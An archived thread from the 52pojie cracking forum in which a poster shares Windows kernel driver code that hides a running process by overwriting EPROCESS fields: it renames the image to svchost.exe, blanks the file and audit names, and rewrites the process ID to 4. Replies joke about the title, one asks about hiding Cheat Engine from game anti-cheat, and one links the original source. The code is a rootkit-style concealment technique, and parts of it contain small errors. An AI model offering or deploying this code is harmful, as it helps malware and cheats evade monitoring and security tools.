震惊支持XP-win10的进程隐藏居然是

blmk 发表于 2019-10-30 13:27

先上图,驱动执行完毕以后
任务管理器和工具上的进程都不见了,那么他到底去哪里了呢
对没错把名字抹掉了，别人都是写个别的进程的名字因为我懒所以直接写空
上代码
BOOLEAN PathSeAuditProcessCreationInfo(PEPROCESS Process, WCHAR* ProcessName){
PUNICODE_STRING Name ;
PUNICODE_STRING SelocateName;

SeLocateProcessImageName(Process, &SelocateName);

ExFreePool(SelocateName);

Name = (PUNICODE_STRING)(*(PULONG_PTR)((ULONG_PTR)Process + 0x468));//+0x468 SeAuditProcessCreationInfo

if ((wcslen(ProcessName) * 2) > Name->Length)
{
return FALSE;
}

RtlZeroMemory(Name->Buffer, Name->MaximumLength);
RtlCopyMemory(Name->Buffer, ProcessName, wcslen(ProcessName) * 2);
Name->Length = wcslen(ProcessName) * 2;
return TRUE;
}

对应结构体中
BOOLEAN PathImageFileName(PEPROCESS Process, char* cName)
{
char szNameBuff = { 0 };
UCHAR* szProcessBuff = NULL;
size_tcNamelen = 0;

cNamelen = strlen(cName);

RtlZeroMemory(szNameBuff, sizeof(szNameBuff));
if (cNamelen > 15)
RtlCopyMemory(szNameBuff, cName, sizeof(szNameBuff));
else
RtlCopyMemory(szNameBuff, cName, cNamelen);
szProcessBuff = PsGetProcessImageFileName(Process);
RtlZeroMemory(szProcessBuff, sizeof(szNameBuff));
RtlCopyMemory(szProcessBuff, szNameBuff, sizeof(szNameBuff));

return TRUE;
}

bool Win10ImageNamePoint(PEPROCESS Process, WCHAR* szFullName)
{
BOOLEAN bRet ;
PFILE_OBJECT pFileObject ;
WCHAR* szNewFullName = NULL;

szNewFullName = static_cast<WCHAR*>( ExAllocatePool(NonPagedPool, MAX_PATH * 2));

RtlZeroMemory(szNewFullName, MAX_PATH * 2);

pFileObject = (PFILE_OBJECT)(*(PULONG_PTR)((ULONG_PTR)Process + 0x448)); //+0x448 ImageFilePointer

if (pFileObject->FileName.Length >= wcslen(szFullName) * 2)
{
RtlZeroMemory(pFileObject->FileName.Buffer, pFileObject->FileName.MaximumLength);
RtlCopyMemory(pFileObject->FileName.Buffer, szFullName, wcslen(szFullName) * 2);
pFileObject->FileName.Length = wcslen(szFullName) * 2;
ExFreePool(szNewFullName);
bRet = TRUE;
}
else
{
RtlCopyMemory(szNewFullName, szFullName, wcslen(szFullName) * 2);
pFileObject->FileName.Buffer = szNewFullName;
pFileObject->FileName.Length = wcslen(szFullName) * 2;
pFileObject->FileName.MaximumLength = MAX_PATH * 2;
bRet = TRUE;
}

return bRet;
}

这个结构体成员似乎只有win10 才有

还有很重要的一步
VOID modifyProcessUniqueProcessId(PEPROCESS Process)
{
PVOID64 UnProcessID;
PVOID64 InFromUnProceesID;
ULONGLONG Upid = 4;
ULONGLONG InFromPid = 0;
UnProcessID =(PULONG_PTR)((ULONGLONG)Process + 0x2e8);//+0x2e8 UniqueProcessId
RtlCopyMemory(UnProcessID, &Upid, sizeof(ULONGLONG));
InFromUnProceesID = (PULONG_PTR)((ULONGLONG)Process + 0x3e8); //+0x3e8 InheritedFromUniqueProcessId
RtlCopyMemory(InFromUnProceesID, &InFromPid, sizeof(ULONGLONG));
return ;
}

BOOLEAN checkProcessModify(HANDLE pid)
{
PEPROCESS Process = NULL;
NTSTATUS status = PsLookupProcessByProcessId((HANDLE)pid, &Process);
if (!NT_SUCCESS(status))
{
return FALSE;
}
PathImageFileName(Process, "svchost.exe");
PathWin10ImageNamePoint(Process, L" ");
PathSeAuditProcessCreationInfo(Process, L" ");
modifyProcessUniqueProcessId(Process);
ObDereferenceObject(Process);
return TRUE;
}
附上windbg的效果图

对了似乎还有3环的PEB结构中的三个链条没断，那个三环就可以做.

qingjie2010 发表于 2019-10-30 13:45

学习学习了，吾爱油腻更精彩~

ZuiShuai-Song 发表于 2019-10-30 13:50

建议你去UC震惊部上班

wgy1213 发表于 2019-10-30 13:53

真厉害这么牛

逝去的流梦 发表于 2019-10-30 14:13

你好，你已经被UC震惊部录取了，工资随便开，明天上午8点到我们总部报到。如有疑问，请拨打110，谢谢合作。

p6858446 发表于 2019-10-30 14:18

用hidetoolz隐藏了CE还是会被游戏检测出来提示我不要打开与游戏无关的软件，然后闪退~~

mokson 发表于 2019-10-30 21:27

TL90 发表于 2019-10-31 10:29

还是会被检测吧

kz丶cn 发表于 2019-10-31 14:06

https://github.com/zhuhuibeishadiao/PathModification/blob/master/PathModification.c 请注明出处

A学习的小菜鸟 发表于 2021-9-15 20:01

这就是利用内核api进行进程隐藏啊，标题搞得这么吓人，还以为是新一代打的隐藏技术呢

页: [1]

吾爱破解 - 52pojie.cn's Archiver

震惊支持XP-win10的进程隐藏居然是